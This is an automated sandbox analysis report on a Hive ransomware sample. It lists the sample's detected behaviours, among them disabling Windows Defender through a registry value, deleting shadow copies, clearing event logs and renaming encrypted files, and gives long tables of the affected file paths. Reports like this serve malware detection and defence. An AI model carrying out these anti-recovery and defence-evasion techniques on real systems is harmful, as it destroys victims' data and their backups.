Analysis Overview
SHA256
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
Threat Level: Known bad
The file df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687 was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Interacts with shadow copies
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 14:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 14:02
Reported
2022-01-13 14:07
Platform
win7-en-20211208
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ConvertUnprotect.tif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatRemove.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RevokeResolve.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchCheckpoint.raw => C:\Users\Admin\Pictures\WatchCheckpoint.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WatchCheckpoint.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\EnableAssert.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MountClear.raw => C:\Users\Admin\Pictures\MountClear.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MountClear.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutPublish.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ExportStep.png.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeResolve.raw => C:\Users\Admin\Pictures\RevokeResolve.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SyncSave.crw => C:\Users\Admin\Pictures\SyncSave.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SyncSave.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertUnprotect.tif => C:\Users\Admin\Pictures\ConvertUnprotect.tif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnableAssert.tiff => C:\Users\Admin\Pictures\EnableAssert.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\EnterRestore.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExportStep.png => C:\Users\Admin\Pictures\ExportStep.png.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnterRestore.tiff => C:\Users\Admin\Pictures\EnterRestore.tiff.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FormatRemove.raw => C:\Users\Admin\Pictures\FormatRemove.raw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutPublish.crw => C:\Users\Admin\Pictures\OutPublish.crw.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEM.CFG.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\PREVIEW.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Waveform.thmx.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEIRM.XML.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBCALSO.POC.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\PREVIEW.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\WMPMediaSharing.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238927.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\calendar.html | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART4.BDR.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\wmlaunch.exe.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\AXIS.INF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_K_COL.HXK.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Efate.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.DPV.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\rtstreamsink.ax | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10358_.GIF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18252_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\picturePuzzle.js | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\NOTICE.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF.GzDoZX8zXhlbD_AwIvftPS0Aij9oNsJ32gLM5_LdZtH_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
